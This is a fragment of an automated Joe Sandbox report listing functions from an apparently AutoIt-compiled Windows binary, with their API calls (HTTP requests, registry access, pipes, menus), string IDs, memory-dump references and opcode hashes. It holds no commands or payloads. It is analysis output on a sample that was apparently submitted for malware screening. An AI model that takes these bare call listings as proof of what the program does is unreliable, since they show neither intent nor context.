                                                                        • EnterCriticalSection.KERNEL32(014BEB54,?,008CD0F3), ref: 008F7254
                                                                        • TerminateThread.KERNEL32(014BEB98,000001F6,?,008CD0F3), ref: 008F7261
                                                                        • WaitForSingleObject.KERNEL32(014BEB98,000003E8,?,008CD0F3), ref: 008F726E
                                                                          • Part of subcall function 008F6C35: CloseHandle.KERNEL32(014BEB98,014BEB54,008F727B,?,008CD0F3), ref: 008F6C3F
                                                                        • InterlockedExchange.KERNEL32(014BEB9C,000001F6), ref: 008F7281
                                                                        • LeaveCriticalSection.KERNEL32(014BEB54,?,008CD0F3), ref: 008F7288
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                        • String ID:
                                                                        • API String ID: 3495660284-0
                                                                        • Opcode ID: ae2cbc6bad6001e02bcdbe529f6f86a480c01429a0fbfac876e5abb7ca9ddd97
                                                                        • Instruction ID: bc9849677f81f8a54d4ae014b0b4ac40491d7fdffc900aed57fe7f3803efe006
                                                                        • Opcode Fuzzy Hash: ae2cbc6bad6001e02bcdbe529f6f86a480c01429a0fbfac876e5abb7ca9ddd97
                                                                        • Instruction Fuzzy Hash: 8AF0E236658A0AEBE7111B34EC4C9EB373AFF04312B500A32F603D00A0CBB61800EB50
                                                                        Function 008E8992 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 008E899D
                                                                        • UnloadUserProfile.USERENV(?,?), ref: 008E89A9
                                                                        • CloseHandle.KERNEL32(?), ref: 008E89B2
                                                                        • CloseHandle.KERNEL32(?), ref: 008E89BA
                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 008E89C3
                                                                        • HeapFree.KERNEL32(00000000), ref: 008E89CA
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                        • String ID:
                                                                        • API String ID: 146765662-0
                                                                        • Opcode ID: f85fe1abefe0c3e56f856a9b272579d7cee391cfd7da83800b68828253091a21
                                                                        • Instruction ID: d2c491b294d055126ce56a05a6eda5c2182b8843abac94426a9f1db95c7f23ed
                                                                        • Opcode Fuzzy Hash: f85fe1abefe0c3e56f856a9b272579d7cee391cfd7da83800b68828253091a21
                                                                        • Instruction Fuzzy Hash: FBE0C236218809FBDA011FE1EC1C98ABB69FB89362B508230F229810B0CB329421EB50
                                                                        Function 009085ED Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • VariantInit.OLEAUT32(?), ref: 00908613
                                                                        • CharUpperBuffW.USER32(?,?), ref: 00908722
                                                                        • VariantClear.OLEAUT32(?), ref: 0090889A
                                                                          • Part of subcall function 008F7562: VariantInit.OLEAUT32(00000000), ref: 008F75A2
                                                                          • Part of subcall function 008F7562: VariantCopy.OLEAUT32(00000000,?), ref: 008F75AB
                                                                          • Part of subcall function 008F7562: VariantClear.OLEAUT32(00000000), ref: 008F75B7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                        • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                        • API String ID: 4237274167-1221869570
                                                                        • Opcode ID: 445cb5e7ace87ed098d655415cc73540dda67128ff92fc8d536c9e49b1291a56
                                                                        • Instruction ID: fb99b88e607920cf3c75bbda92e401fb62649c1aff78a3982d4e10f492b2fc48
                                                                        • Opcode Fuzzy Hash: 445cb5e7ace87ed098d655415cc73540dda67128ff92fc8d536c9e49b1291a56
                                                                        • Instruction Fuzzy Hash: 53914A716043019FCB10EF28C48595BBBE8FF89714F14892DF89A8B2A1DB31E945CB52
                                                                        Function 008F2A96 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 008AFC86: _wcscpy.LIBCMT ref: 008AFCA9
                                                                        • _memset.LIBCMT ref: 008F2B87
                                                                        • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 008F2BB6
                                                                        • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 008F2C69
                                                                        • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 008F2C97
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                        • String ID: 0
                                                                        • API String ID: 4152858687-4108050209
                                                                        • Opcode ID: f6d2652e426589f88e3ad349ad69400f43e209ba2fe3c8de19bcd9313528956d
                                                                        • Instruction ID: 534013d4f86b24c6312b706463eb48f47776a7d51e366ca74a9d49e0163fc468
                                                                        • Opcode Fuzzy Hash: f6d2652e426589f88e3ad349ad69400f43e209ba2fe3c8de19bcd9313528956d
                                                                        • Instruction Fuzzy Hash: E651CC712083099AD724EF38C855A7FB7E8FF99360F040A2DFA95D6291DB70CC049B92
                                                                        Function 008ED56C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121comlibraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 008ED5D4
                                                                        • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 008ED60A
                                                                        • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 008ED61B
                                                                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 008ED69D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorMode$AddressCreateInstanceProc
                                                                        • String ID: DllGetClassObject
                                                                        • API String ID: 753597075-1075368562
                                                                        • Opcode ID: 8832fc65473daa84b223ffaf5d6a43f978c50e0c6bcb8869c2fbe22e492ba404
                                                                        • Instruction ID: 157a35ae6be1702190cb15ef9bd32f1f36f1f84727b81d4ec220118f5411a525
                                                                        • Opcode Fuzzy Hash: 8832fc65473daa84b223ffaf5d6a43f978c50e0c6bcb8869c2fbe22e492ba404
                                                                        • Instruction Fuzzy Hash: C441ACB1600348EFDB05CF65C884A9ABBA9FF56314F1181A9AC09DF215D7B1D948CBE0
                                                                        Function 008F2753 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 008F27C0
                                                                        • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 008F27DC
                                                                        • DeleteMenu.USER32(?,00000007,00000000), ref: 008F2822
                                                                        • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00955890,00000000), ref: 008F286B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Menu$Delete$InfoItem_memset
                                                                        • String ID: 0
                                                                        • API String ID: 1173514356-4108050209
                                                                        • Opcode ID: 7bf61a6efee24151b5cb236f780072b7b4637adc9a0c86daabbede23cc863c4d
                                                                        • Instruction ID: 3fe05c23f08d81b0ba45352a2cbd8821dc836c9a9bc6e1618a66c340b0edb8cf
                                                                        • Opcode Fuzzy Hash: 7bf61a6efee24151b5cb236f780072b7b4637adc9a0c86daabbede23cc863c4d
                                                                        • Instruction Fuzzy Hash: E741AE702143499FDB20DF38C845B6ABBE9FF85764F04492DFAA5D7291D730A805CB52
                                                                        Function 0090D7A5 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0090D7C5
                                                                          • Part of subcall function 0089784B: _memmove.LIBCMT ref: 00897899
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: BuffCharLower_memmove
                                                                        • String ID: cdecl$none$stdcall$winapi
                                                                        • API String ID: 3425801089-567219261
                                                                        • Opcode ID: 9e2dc16eee78030b68930aace1cb346283daa2de85cdb6cdfb94d070cdfa0ce9
                                                                        • Instruction ID: e457a159b7fdc27d6b106f6ea5719589362504e9deefc3eeb9d53852c06c889a
                                                                        • Opcode Fuzzy Hash: 9e2dc16eee78030b68930aace1cb346283daa2de85cdb6cdfb94d070cdfa0ce9
                                                                        • Instruction Fuzzy Hash: 1D31A171904619AFCF10EF98CC519FEB7B9FF05720B108A29E826977D1DB31A905CB80
                                                                        Function 008E8E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00897DE1: _memmove.LIBCMT ref: 00897E22
                                                                          • Part of subcall function 008EAA99: GetClassNameW.USER32(?,?,000000FF), ref: 008EAABC
                                                                        • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 008E8F14
                                                                        • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 008E8F27
                                                                        • SendMessageW.USER32(?,00000189,?,00000000), ref: 008E8F57
                                                                          • Part of subcall function 00897BCC: _memmove.LIBCMT ref: 00897C06
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$_memmove$ClassName
                                                                        • String ID: ComboBox$ListBox
                                                                        • API String ID: 365058703-1403004172
                                                                        • Opcode ID: e404087956c1d128fcc4428b2cdfc7f4f68abfce0782aae5041a5dada66548d7
                                                                        • Instruction ID: 540d16a188ddb925317c8cb83b4f13c388f0f55e5f421639519e3d266b23e830
                                                                        • Opcode Fuzzy Hash: e404087956c1d128fcc4428b2cdfc7f4f68abfce0782aae5041a5dada66548d7
                                                                        • Instruction Fuzzy Hash: BA210471A04108BEDF14ABB9DC85DFFB769EF46364B084529F825E72E0DF354809D610
                                                                        Function 0090182D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0090184C
                                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00901872
                                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 009018A2
                                                                        • InternetCloseHandle.WININET(00000000), ref: 009018E9
                                                                          • Part of subcall function 00902483: GetLastError.KERNEL32(?,?,00901817,00000000,00000000,00000001), ref: 00902498
                                                                          • Part of subcall function 00902483: SetEvent.KERNEL32(?,?,00901817,00000000,00000000,00000001), ref: 009024AD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                        • String ID:
                                                                        • API String ID: 3113390036-3916222277
                                                                        • Opcode ID: 7d9afb1e0728b6b69ae10d4df236d1327bfef8a8410cacfbf23473ebe91a6b25
                                                                        • Instruction ID: 36bf033744ee1bfe3634a0368fa435fafd3fd2fa82f1122eaecd7c2f967340a0
                                                                        • Opcode Fuzzy Hash: 7d9afb1e0728b6b69ae10d4df236d1327bfef8a8410cacfbf23473ebe91a6b25
                                                                        • Instruction Fuzzy Hash: CB2192B1604308BFEB119F64DC85EBF77EDEB88754F10812AF90596280DB349E05A7A1
                                                                        Function 009163E7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00891D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00891D73
                                                                          • Part of subcall function 00891D35: GetStockObject.GDI32(00000011), ref: 00891D87
                                                                          • Part of subcall function 00891D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00891D91
                                                                        • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00916461
                                                                        • LoadLibraryW.KERNEL32(?,?,?,?,?,008CCB2A,?,?,?,?,?,?,?,?,?), ref: 00916468
                                                                        • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 0091647D
                                                                        • DestroyWindow.USER32(?,?,?,?,?,008CCB2A,?,?,?,?,?,?,?,?,?), ref: 00916485
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                        • String ID: SysAnimate32
                                                                        • API String ID: 4146253029-1011021900
                                                                        • Opcode ID: 0830a2ef0b39307c07899a9accdb919b3c77d46f5df45397cb6e1d3577a3bb45
                                                                        • Instruction ID: e81ccab770fe7552ee1597fa8a40d75087194d577e7daae5a0e7f4cbee7bd76a
                                                                        • Opcode Fuzzy Hash: 0830a2ef0b39307c07899a9accdb919b3c77d46f5df45397cb6e1d3577a3bb45
                                                                        • Instruction Fuzzy Hash: A6218E71B1020DABEF108FA4DC94EFB37ADEB59368F108629FA50920E0D7319C81A760
                                                                        Function 008F6D9C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetStdHandle.KERNEL32(0000000C), ref: 008F6DBC
                                                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 008F6DEF
                                                                        • GetStdHandle.KERNEL32(0000000C), ref: 008F6E01
                                                                        • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 008F6E3B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: CreateHandle$FilePipe
                                                                        • String ID: nul
                                                                        • API String ID: 4209266947-2873401336
                                                                        • Opcode ID: 32c4a7351095f5920dee2d1aa206a0747662d0f1492c798e2eec82ddc4190847
                                                                        • Instruction ID: 50ed612e4adc16443ae0874c179db8c77f147a867ae5bf7b6a388f5bc3a450da
                                                                        • Opcode Fuzzy Hash: 32c4a7351095f5920dee2d1aa206a0747662d0f1492c798e2eec82ddc4190847
                                                                        • Instruction Fuzzy Hash: 7521817560020DABDB20AF39DC05AAA77B4FF54760F204B19FEA0D72D0E7719960DB50
                                                                        Function 008F6E6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetStdHandle.KERNEL32(000000F6), ref: 008F6E89
                                                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 008F6EBB
                                                                        • GetStdHandle.KERNEL32(000000F6), ref: 008F6ECC
                                                                        • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 008F6F06
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: CreateHandle$FilePipe
                                                                        • String ID: nul
                                                                        • API String ID: 4209266947-2873401336
                                                                        • Opcode ID: dad4aa27e6238d24e3228dcc17b8c9396c56090c417c3c16400ba9553e61212c
                                                                        • Instruction ID: 50d767f9f71ead9237488f23a206dc87f649e68b6f615e3c5ed8a58c9d9c4b4c
                                                                        • Opcode Fuzzy Hash: dad4aa27e6238d24e3228dcc17b8c9396c56090c417c3c16400ba9553e61212c
                                                                        • Instruction Fuzzy Hash: 93217F7A60020D9BDB209F79D804AAA77A8FF55724F304B19FAA0D72D0E7709860CB61
                                                                        Function 008F1AE8 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CharUpperBuffW.USER32(?,?), ref: 008F1B19
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: BuffCharUpper
                                                                        • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                        • API String ID: 3964851224-769500911
                                                                        • Opcode ID: dc6cfc6aafb61fee14eed65f3b2005728a634b87ce5f422cb8a21a811e8c563b
                                                                        • Instruction ID: 0c01ac63354ed1fb496ead16b024de1da9f48557da595d75bf02dd79f5cf1b6c
                                                                        • Opcode Fuzzy Hash: dc6cfc6aafb61fee14eed65f3b2005728a634b87ce5f422cb8a21a811e8c563b
                                                                        • Instruction Fuzzy Hash: 29113C30910219CBCF10EF68D8659FFB7B4FF25704B1484A5E825A7692EB325906CF51
                                                                        Function 0090EB55 Relevance: 7.7, APIs: 5, Instructions: 247COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0090EC07
                                                                        • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0090EC37
                                                                        • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0090ED6A
                                                                        • CloseHandle.KERNEL32(?), ref: 0090EDEB
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                        • String ID:
                                                                        • API String ID: 2364364464-0
                                                                        • Opcode ID: be28208c33464ee37914a9fb133542387899d6c186e6f91bf4f4bb65ab9ec1e5
                                                                        • Instruction ID: 92b0acbe81b63c8feb4d6beb7bcc343a4dfe61ded65244d1ed59912e2d0cbc9a
                                                                        • Opcode Fuzzy Hash: be28208c33464ee37914a9fb133542387899d6c186e6f91bf4f4bb65ab9ec1e5
                                                                        • Instruction Fuzzy Hash: 57814C716047019FDB60EF29C886B2AB7E5EF55710F04882DF999DB2D2D670AC40CB92
                                                                        Function 00910037 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00897DE1: _memmove.LIBCMT ref: 00897E22
                                                                          • Part of subcall function 00910E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0090FDAD,?,?), ref: 00910E31
                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009100FD
                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0091013C
                                                                        • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00910183
                                                                        • RegCloseKey.ADVAPI32(?,?), ref: 009101AF
                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 009101BC
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
